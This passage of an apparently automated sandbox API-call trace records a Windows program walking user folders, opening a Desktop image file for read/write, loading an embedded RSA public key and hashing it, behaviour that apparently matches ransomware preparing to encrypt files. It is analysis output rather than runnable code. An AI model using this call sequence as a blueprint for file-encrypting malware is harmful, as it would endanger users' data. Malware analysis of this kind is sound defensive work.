Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.048] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.050] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.050] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.051] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\") returned="LocalLow\\" [0188.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0188.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f438 [0188.051] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\") returned="AppData\\" [0188.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0188.051] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0188.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0188.051] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0188.051] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0188.051] PathFindFileNameW (pszPath="") returned="" [0188.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.052] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\locallow\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796723b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x23a1d229, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0188.052] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796723b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x23a1d229, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0188.052] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x50fdc710, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x50fdc710, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0188.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0188.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0188.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0188.052] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x50fdc710, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x50fdc710, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0188.052] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0188.053] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0188.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b10 [0188.053] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0188.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0188.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0188.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0188.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.057] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0188.057] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0188.057] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\OhY9bMSmLfI5\\") returned="OhY9bMSmLfI5\\" [0188.057] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\") returned="Desktop\\" [0188.057] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0188.057] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0188.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27cc0 | out: hHeap=0x6a0000) returned 1 [0188.057] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0188.057] PathFindFileNameW (pszPath="") returned="" [0188.057] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\OhY9bMSmLfI5\\*" (normalized: "c:\\users\\keecfmwgj\\desktop\\ohy9bmsmlfi5\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee880420, ftCreationTime.dwHighDateTime=0x1d898ba, ftLastAccessTime.dwLowDateTime=0x24ef4670, ftLastAccessTime.dwHighDateTime=0x1d8a6d7, ftLastWriteTime.dwLowDateTime=0x24ef4670, ftLastWriteTime.dwHighDateTime=0x1d8a6d7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0188.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.059] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee880420, ftCreationTime.dwHighDateTime=0x1d898ba, ftLastAccessTime.dwLowDateTime=0x24ef4670, ftLastAccessTime.dwHighDateTime=0x1d8a6d7, ftLastWriteTime.dwLowDateTime=0x24ef4670, ftLastWriteTime.dwHighDateTime=0x1d8a6d7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0188.059] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2bb7d590, ftCreationTime.dwHighDateTime=0x1d8a4ba, ftLastAccessTime.dwLowDateTime=0xd2068220, ftLastAccessTime.dwHighDateTime=0x1d8a686, ftLastWriteTime.dwLowDateTime=0xd2068220, ftLastWriteTime.dwHighDateTime=0x1d8a686, nFileSizeHigh=0x0, nFileSizeLow=0x5070, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5UvLwu6-nNEbg.jpg", cAlternateFileName="5UVLWU~1.JPG")) returned 1 [0188.059] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\OhY9bMSmLfI5\\5UvLwu6-nNEbg.jpg") returned=".jpg" [0188.059] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\OhY9bMSmLfI5\\5UvLwu6-nNEbg.jpg" (normalized: "c:\\users\\keecfmwgj\\desktop\\ohy9bmsmlfi5\\5uvlwu6-nnebg.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0188.061] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=20592) returned 1 [0188.061] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0188.065] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x504a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.065] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0188.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0188.068] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0188.068] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.068] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x5070, lpOverlapped=0x0) returned 1 [0188.068] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0188.069] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.069] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.069] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0188.070] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0188.070] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0188.070] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0188.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0188.070] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0188.070] GetLastError () returned 0x0 [0188.070] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0188.070] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0188.070] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0188.070] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0188.070] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0188.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0188.070] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0188.070] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0188.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0188.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5070) returned 0x2d43778 [0188.071] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0188.071] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0188.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0188.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0188.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0188.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0188.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f438 [0188.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397d8 [0188.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3f0 [0188.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397f0 [0188.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39820 [0188.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39880 [0188.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39838 [0188.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0188.072] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0188.072] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0188.072] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0188.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39820 | out: hHeap=0x6a0000) returned 1 [0188.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39838 | out: hHeap=0x6a0000) returned 1 [0188.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39880 | out: hHeap=0x6a0000) returned 1 [0188.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0188.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.072] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39880 [0188.072] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0188.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39838 [0188.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0188.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39820 [0188.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0188.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0188.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27cc0 [0188.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0188.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0188.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0188.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0188.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0188.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0188.073] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39838 | out: hHeap=0x6a0000) returned 1 [0188.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0188.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39820 | out: hHeap=0x6a0000) returned 1 [0188.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0188.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0188.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39880 | out: hHeap=0x6a0000) returned 1 [0188.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27cc0 | out: hHeap=0x6a0000) returned 1 [0188.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0188.075] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0188.075] GetCurrentThreadId () returned 0x264 [0188.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0188.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d38188 [0188.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0188.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0188.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0188.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0188.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0188.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0188.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0188.075] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0188.076] GetCurrentThreadId () returned 0x264 [0188.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0188.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0188.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0188.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0188.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0188.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0188.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0188.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0188.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0188.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0188.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82b10 [0188.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0188.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0188.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0188.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39880 [0188.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0188.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0188.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0188.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0188.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0188.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0188.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0188.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0188.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39820 [0188.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0188.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0188.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0188.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0188.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 